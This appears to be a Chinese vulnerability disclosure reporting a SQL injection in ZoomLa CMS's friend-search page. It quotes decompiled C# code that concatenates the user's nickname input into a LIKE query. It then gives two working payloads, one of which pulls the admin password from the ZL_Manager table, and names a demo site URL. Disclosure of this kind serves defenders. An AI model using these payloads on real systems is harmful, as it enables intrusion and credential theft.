### 简要描述:
rt.
### 详细说明:
在线聊天功能都有,你敢信.
会员中心.在线聊天查找好友:http:demo.zoomla.cn/user/usertalk/SelectFrient.aspx,按昵称查找,注入点.
```
user/usertalk/SelectFrient.aspx
<%@ page language="C#" autoeventwireup="true" validaterequest="false" inherits="User_Usertalk_SelectFrient, App_Web_ekn5n2xj" enableviewstatemac="false" enableEventValidation="false" viewStateEncryptionMode="Never" %>
```
```
App_Web_ekn5n2xj.User_Usertalk_SelectFrient
button1_Click()
cll = this.bu.GetuserTbUserBase(DataConverter.CLng(this.SelectID.Text));
(按照ID查找处经过处理)
cll = this.bu.GetuserTbUserBase(this.SelectName.Text);
string cmdText = "SELECT * FROM " + strTableName + " WHERE 1=1";
if (!string.IsNullOrEmpty(strVal))
{
cmdText = cmdText + " AND " + strField + " LIKE '%" + strVal + "%' ";
return SqlHelper.ExecuteTable(CommandType.Text, cmdText, null);
}
```
### 漏洞证明:
z%' and @@version>0 and '%'='
z%' and (select top 1 AdminPassword from ZL_Manager)>0 and '%'='
[<img src="https://images.seebug.org/upload/201408/021122452a7c76e01eb591390399b7bcbd5b8cb9.jpg" alt="080203.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/021122452a7c76e01eb591390399b7bcbd5b8cb9.jpg)
[<img src="https://images.seebug.org/upload/201408/0211225838458dcd73db6ccd8c4b5f27975580c3.jpg" alt="080204.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/0211225838458dcd73db6ccd8c4b5f27975580c3.jpg)
暂无评论